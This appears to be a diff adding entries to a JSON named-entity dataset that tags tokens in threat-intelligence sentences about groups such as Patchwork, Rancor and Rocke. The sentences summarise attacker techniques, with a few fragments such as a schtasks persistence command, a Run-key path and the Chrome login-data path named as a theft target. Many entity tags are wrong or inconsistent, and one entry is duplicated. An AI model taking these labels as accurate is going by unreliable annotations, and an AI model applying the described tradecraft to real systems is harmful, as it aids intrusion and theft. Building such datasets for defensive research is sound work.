+ "and", + "spoofed", + "legitimate", + "software", + "companies", + "that", + "were", + "later", + "used", + "to", + "sign", + "malware." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Patchwork", + "has", + "obfuscated", + "a", + "script", + "with", + "Crypto", + "Obfuscator." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "Patchwork", + "dumped", + "the", + "login", + "data", + "database", + "from", + "<code>\\AppData\\Local\\Google\\Chrome\\User", + "Data\\Default\\Login", + "Data</code>." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "A", + "Patchwork", + ".dll", + "that", + "contains", + "BADNEWS", + "is", + "loaded", + "and", + "executed", + "using", + "DLL", + "side-loading." + ], + "ner_tags": [ + "O", + "B-Idus", + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-HackOrg" + ] + }, + { + "tokens": [ + "Patchwork", + "collected", + "and", + "exfiltrated", + "files", + "from", + "the", + "infected", + "system." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Patchwork", + "hides", + "base64-encoded", + "and", + "encrypted", + "C2", + "server", + "locations", + "in", + "comments", + "on", + "legitimate", + "websites." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Patchwork", + "has", + "used", + "watering", + "holes", + "to", + "deliver", + "files", + "with", + "exploits", + "to", + "initial", + "victims." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Patchwork", + "leveraged", + "the", + "DDE", + "protocol", + "to", + "deliver", + "their", + "malware." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Patchwork", + "uses", + "malicious", + "documents", + "to", + "deliver", + "remote", + "execution", + "exploits", + "as", + "part", + "of.", + "The", + "group", + "has", + "previously", + "exploited", + "CVE-2017-8570,", + "CVE-2012-1856,", + "CVE-2014-4114,", + "CVE-2017-0199,", + "CVE-2017-11882,", + "and", + "CVE-2015-1641." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-HackOrg", + "O", + "O", + "O", + "B-Features", + "B-Features", + "B-Features", + "B-Features", + "B-Features", + "O", + "B-Features" + ] + }, + { + "tokens": [ + "Patchwork", + "removed", + "certain", + "files", + "and", + "replaced", + "them", + "so", + "they", + "could", + "not", + "be", + "retrieved." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "A", + "Patchwork", + "payload", + "has", + "searched", + "all", + "fixed", + "drives", + "on", + "the", + "victim", + "for", + "files", + "matching", + "a", + "specified", + "list", + "of", + "extensions." + ], + "ner_tags": [ + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Patchwork", + "apparently", + "altered", + "NDiskMonitor", + "samples", + "by", + "adding", + "four", + "bytes", + "of", + "random", + "letters", + "in", + "a", + "likely", + "attempt", + "to", + "change", + "the", + "file", + "hashes." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "I-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Patchwork", + "payloads", + "download", + "additional", + "files", + "from", + "the", + "C2", + "server." + ], + "ner_tags": [ + "B-Idus", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Patchwork", + "copied", + "all", + "targeted", + "files", + "to", + "a", + "directory", + "called", + "index", + "that", + "was", + "eventually", + "uploaded", + "to", + "the", + "C&C", + "server." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Patchwork", + "embedded", + "a", + "malicious", + "macro", + "in", + "a", + "Word", + "document", + "and", + "lured", + "the", + "victim", + "to", + "click", + "on", + "an", + "icon", + "to", + "execute", + "the", + "malware." + ], + "ner_tags": [ + "B-Idus", + "B-Way", + "O", + "B-Way", + "B-Way", + "O", + "O", + "I-SamFile", + "I-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Patchwork", + "has", + "used", + "spearphishing", + "with", + "links", + "to", + "try", + "to", + "get", + "users", + "to", + "click,", + "download", + "and", + "open", + "malicious", + "files." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Patchwork", + "installed", + "its", + "payload", + "in", + "the", + "startup", + "programs", + "folder", + "as", + "\"Baidu", + "Software", + "Update.\"", + "The", + "group", + "also", + "adds", + "its", + "second", + "stage", + "payload", + "to", + "the", + "startup", + "programs", + "as", + "“Net", + "Monitor.\"", + "They", + "have", + "also", + "dropped", + "QuasarRAT", + "binaries", + "as", + "files", + "named", + "microsoft_network.exe", + "and", + "crome.exe." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "I-Tool", + "O", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "A", + "Patchwork", + "payload", + "deletes", + "Resiliency", + "Registry", + "keys", + "created", + "by", + "Microsoft", + "Office", + "applications", + "in", + "an", + "apparent", + "effort", + "to", + "trick", + "users", + "into", + "thinking", + "there", + "were", + "no", + "issues", + "during", + "application", + "runs." + ], + "ner_tags": [ + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Patchwork", + "used", + "PowerSploit", + "to", + "download", + "payloads,", + "run", + "a", + "reverse", + "shell,", + "and", + "execute", + "malware", + "on", + "the", + "victim's", + "machine." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "A", + "Patchwork", + "payload", + "uses", + "process", + "hollowing", + "to", + "hide", + "the", + "UAC", + "bypass", + "vulnerability", + "exploitation", + "inside", + "svchost.exe." + ], + "ner_tags": [ + "O", + "B-Idus", + "O", + "O", + "B-Tool", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Patchwork", + "has", + "added", + "the", + "path", + "of", + "its", + "second-stage", + "malware", + "to", + "the", + "startup", + "folder", + "to", + "achieve", + "persistence.", + "One", + "of", + "its", + "file", + "stealers", + "has", + "also", + "persisted", + "by", + "adding", + "a", + "Registry", + "Run", + "key." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Tool", + "B-Tool", + "B-Way" + ] + }, + { + "tokens": [ + "Patchwork", + "attempted", + "to", + "use", + "RDP", + "to", + "move", + "laterally." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "A", + "Patchwork", + "file", + "stealer", + "can", + "run", + "a", + "TaskScheduler", + "DLL", + "to", + "add", + "persistence." + ], + "ner_tags": [ + "O", + "B-Idus", + "I-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Patchwork", + "scanned", + "the", + "“Program", + "Files”", + "directories", + "for", + "a", + "directory", + "with", + "the", + "string", + "“Total", + "Security”", + "(the", + "installation", + "path", + "of", + "the", + "“360", + "Total", + "Security”", + "antivirus", + "tool)." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "A", + "Patchwork", + "payload", + "was", + "packed", + "with", + "UPX." + ], + "ner_tags": [ + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Patchwork", + "has", + "used", + "spearphishing", + "with", + "an", + "attachment", + "to", + "deliver", + "files", + "with", + "exploits", + "to", + "initial", + "victims." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Patchwork", + "has", + "used", + "spearphishing", + "with", + "links", + "to", + "deliver", + "files", + "with", + "exploits", + "to", + "initial", + "victims." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Patchwork", + "has", + "used", + "embedded", + "image", + "tags", + "(known", + "as", + "web", + "bugs)", + "with", + "unique,", + "per-recipient", + "tracking", + "links", + "in", + "their", + "emails", + "for", + "the", + "purpose", + "of", + "identifying", + "which", + "recipients", + "opened", + "messages." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Patchwork", + "used", + "Base64", + "to", + "encode", + "C2", + "traffic." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Patchwork", + "collected", + "the", + "victim", + "computer", + "name,", + "OS", + "version,", + "and", + "architecture", + "type", + "and", + "sent", + "the", + "information", + "to", + "its", + "C2", + "server.", + "Patchwork", + "also", + "enumerated", + "all", + "available", + "drives", + "on", + "the", + "victim's", + "machine." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Patchwork", + "collected", + "the", + "victim", + "username", + "and", + "whether", + "it", + "was", + "running", + "as", + "admin,", + "then", + "sent", + "the", + "information", + "to", + "its", + "C2", + "server." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Patchwork", + "has", + "obtained", + "and", + "used", + "open-source", + "tools", + "such", + "as", + "QuasarRAT." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Patchwork", + "used", + "Visual", + "Basic", + "Scripts", + "(VBS)", + "on", + "victim", + "machines." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Tool", + "I-Way", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Patchwork", + "ran", + "a", + "reverse", + "shell", + "with", + "Meterpreter.", + "Patchwork", + "used", + "JavaScript", + "code", + "and", + ".SCT", + "files", + "on", + "victim", + "machines." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Idus", + "O", + "B-Way", + "B-Tool", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PittyTiger", + "has", + "obtained", + "and", + "used", + "tools", + "such", + "as", + "Mimikatz", + "and", + "gsecdump." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "PittyTiger", + "attempts", + "to", + "obtain", + "legitimate", + "credentials", + "during", + "operations." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Poseidon", + "Group", + "searches", + "for", + "administrator", + "accounts", + "on", + "both", + "the", + "local", + "victim", + "machine", + "and", + "the", + "network." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Poseidon", + "Group", + "searches", + "for", + "administrator", + "accounts", + "on", + "both", + "the", + "local", + "victim", + "machine", + "and", + "the", + "network." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Poseidon", + "Group", + "tools", + "attempt", + "to", + "spoof", + "anti-virus", + "processes", + "as", + "a", + "means", + "of", + "self-defense." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Poseidon", + "Group", + "conducts", + "credential", + "dumping", + "on", + "victims,", + "with", + "a", + "focus", + "on", + "obtaining", + "credentials", + "belonging", + "to", + "domain", + "and", + "database", + "servers." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "Poseidon", + "Group's", + "Information", + "Gathering", + "Tool", + "(IGT)", + "includes", + "PowerShell", + "components." + ], + "ner_tags": [ + "O", + "B-Idus", + "B-HackOrg", + "I-Tool", + "I-Tool", + "I-Tool", + "B-Way", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "After", + "compromising", + "a", + "victim,", + "Poseidon", + "Group", + "lists", + "all", + "running", + "processes." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Poseidon", + "Group", + "obtains", + "and", + "saves", + "information", + "about", + "victim", + "network", + "interfaces", + "and", + "addresses." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "After", + "compromising", + "a", + "victim,", + "Poseidon", + "Group", + "discovers", + "all", + "running", + "services." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Malware", + "used", + "by", + "Putter", + "Panda", + "attempts", + "to", + "terminate", + "processes", + "corresponding", + "to", + "two", + "components", + "of", + "Sophos", + "Anti-Virus", + "(SAVAdminService.exe", + "and", + "SavService.exe)." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-SecTeam", + "B-SamFile", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "An", + "executable", + "dropped", + "onto", + "victims", + "by", + "Putter", + "Panda", + "aims", + "to", + "inject", + "the", + "specified", + "DLL", + "into", + "a", + "process", + "that", + "would", + "normally", + "be", + "accessing", + "the", + "network,", + "including", + "Outlook", + "Express", + "(msinm.exe),", + "Outlook", + "(outlook.exe),", + "Internet", + "Explorer", + "(iexplore.exe),", + "and", + "Firefox", + "(firefox.exe)." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Idus", + "O", + "B-Tool", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Droppers", + "used", + "by", + "Putter", + "Panda", + "use", + "RC4", + "or", + "a", + "16-byte", + "XOR", + "key", + "consisting", + "of", + "the", + "bytes", + "0xA0", + "–", + "0xAF", + "to", + "obfuscate", + "payloads." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "A", + "dropper", + "used", + "by", + "Putter", + "Panda", + "installs", + "itself", + "into", + "the", + "ASEP", + "Registry", + "key", + "<code>HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run</code>", + "with", + "a", + "value", + "named", + "McUpdate." + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "RTM", + "has", + "used", + "search", + "order", + "hijacking", + "to", + "force", + "TeamViewer", + "to", + "load", + "a", + "malicious", + "DLL." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-Way", + "I-Way", + "B-Tool", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RTM", + "has", + "used", + "an", + "RSS", + "feed", + "on", + "Livejournal", + "to", + "update", + "a", + "list", + "of", + "encrypted", + "C2", + "server", + "names." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RTM", + "has", + "distributed", + "its", + "malware", + "via", + "the", + "RIG", + "and", + "SUNDOWN", + "exploit", + "kits,", + "as", + "well", + "as", + "online", + "advertising", + "network", + "<code>Yandex.Direct</code>." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O" + ] + }, + { + "tokens": [ + "RTM", + "has", + "attempted", + "to", + "lure", + "victims", + "into", + "opening", + "e-mail", + "attachments", + "to", + "execute", + "malicious", + "code." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RTM", + "has", + "used", + "Registry", + "run", + "keys", + "to", + "establish", + "persistence", + "for", + "the", + "RTM", + "Trojan", + "and", + "other", + "tools,", + "such", + "as", + "a", + "modified", + "version", + "of", + "TeamViewer", + "remote", + "desktop", + "software." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RTM", + "has", + "used", + "a", + "modified", + "version", + "of", + "TeamViewer", + "and", + "Remote", + "Utilities", + "for", + "remote", + "access." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "B-Tool", + "O", + "I-OffAct", + "O" + ] + }, + { + "tokens": [ + "RTM", + "has", + "used", + "spearphishing", + "attachments", + "to", + "distribute", + "its", + "malware." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Rancor", + "has", + "downloaded", + "additional", + "malware,", + "including", + "by", + "using", + "certutil." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Rancor", + "attempted", + "to", + "get", + "users", + "to", + "click", + "on", + "an", + "embedded", + "macro", + "within", + "a", + "Microsoft", + "Office", + "Excel", + "document", + "to", + "launch", + "their", + "malware." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Way", + "I-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Rancor", + "has", + "used", + "<code>msiexec</code>", + "to", + "download", + "and", + "execute", + "malicious", + "installer", + "files", + "over", + "HTTP." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Rancor", + "launched", + "a", + "scheduled", + "task", + "to", + "gain", + "persistence", + "using", + "the", + "<code>schtasks", + "/create", + "/sc</code>", + "command." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Rancor", + "has", + "attached", + "a", + "malicious", + "document", + "to", + "an", + "email", + "to", + "gain", + "initial", + "access." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Rancor", + "has", + "used", + "VBS", + "scripts", + "as", + "well", + "as", + "embedded", + "macros", + "for", + "execution." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Rancor", + "has", + "used", + "HTTP", + "for", + "C2." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "Rancor", + "has", + "used", + "cmd.exe", + "to", + "execute", + "commmands." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-SamFile", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Rancor", + "has", + "complied", + "VBScript-generated", + "MOF", + "files", + "into", + "WMI", + "event", + "subscriptions", + "for", + "persistence." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "B-SamFile", + "O", + "B-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Rocke", + "issued", + "wget", + "requests", + "from", + "infected", + "systems", + "to", + "the", + "C2." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Rocke", + "has", + "installed", + "an", + "\"init.d\"", + "startup", + "script", + "to", + "maintain", + "persistence." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Rocke", + "has", + "cleared", + "log", + "files", + "within", + "the", + "/var/log/", + "folder." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Rocke", + "has", + "compiled", + "malware,", + "delivered", + "to", + "victims", + "as", + ".c", + "files,", + "with", + "the", + "GNU", + "Compiler", + "Collection", + "(GCC)." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Rocke", + "installed", + "a", + "cron", + "job", + "that", + "downloaded", + "and", + "executed", + "files", + "from", + "the", + "C2." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Rocke", + "has", + "used", + "Pastebin", + "to", + "check", + "the", + "version", + "of", + "beaconing", + "malware", + "and", + "redirect", + "to", + "another", + "Pastebin", + "hosting", + "updated", + "malware." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Rocke", + "has", + "extracted", + "tar.gz", + "files", + "after", + "downloading", + "them", + "from", + "a", + "C2", + "server." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Rocke", + "used", + "scripts", + "which", + "killed", + "processes", + "and", + "added", + "firewall", + "rules", + "to", + "block", + "traffic", + "related", + "to", + "other", + "cryptominers." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-OffAct", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Rocke", + "used", + "scripts", + "which", + "detected", + "and", + "uninstalled", + "antivirus", + "software." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Rocke", + "has", + "modified", + "/etc/ld.so.preload", + "to", + "hook", + "libc", + "functions", + "in", + "order", + "to", + "hide", + "the", + "installed", + "dropper", + "and", + "mining", + "software", + "in", + "process", + "lists." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Rocke", + "exploited", + "Apache", + "Struts,", + "Oracle", + "WebLogic", + "(CVE-2017-10271),", + "and", + "Adobe", + "ColdFusion", + "(CVE-2017-3066)", + "vulnerabilities", + "to", + "deliver", + "malware." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Rocke", + "has", + "deleted", + "files", + "on", + "infected", + "machines." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Rocke", + "downloaded", + "a", + "file", + "\"libprocesshider\",", + "which", + "could", + "hide", + "files", + "on", + "the", + "target", + "system." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Rocke", + "used", + "malware", + "to", + "download", + "additional", + "malicious", + "files", + "to", + "the", + "target", + "system." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Purp", + "B-Features", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Rocke", + "has", + "changed", + "file", + "permissions", + "of", + "files", + "so", + "they", + "could", + "not", + "be", + "modified." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Rocke", + "has", + "used", + "shell", + "scripts", + "which", + "download", + "mining", + "executables", + "and", + "saves", + "them", + "with", + "the", + "filename", + "\"java\"." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "I-Features", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Rocke", + "conducted", + "scanning", + "for", + "exposed", + "TCP", + "port", + "7001", + "as", + "well", + "as", + "SSH", + "and", + "Redis", + "servers." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Rocke's", + "miner", + "connects", + "to", + "a", + "C2", + "server", + "using", + "port", + "51640." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Rocke", + "has", + "modified", + "UPX", + "headers", + "after", + "packing", + "files", + "to", + "break", + "unpackers." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Rocke's", + "miner,", + "\"TermsHost.exe\",", + "evaded", + "defenses", + "by", + "injecting", + "itself", + "into", + "Windows", + "processes,", + "including", + "Notepad.exe." 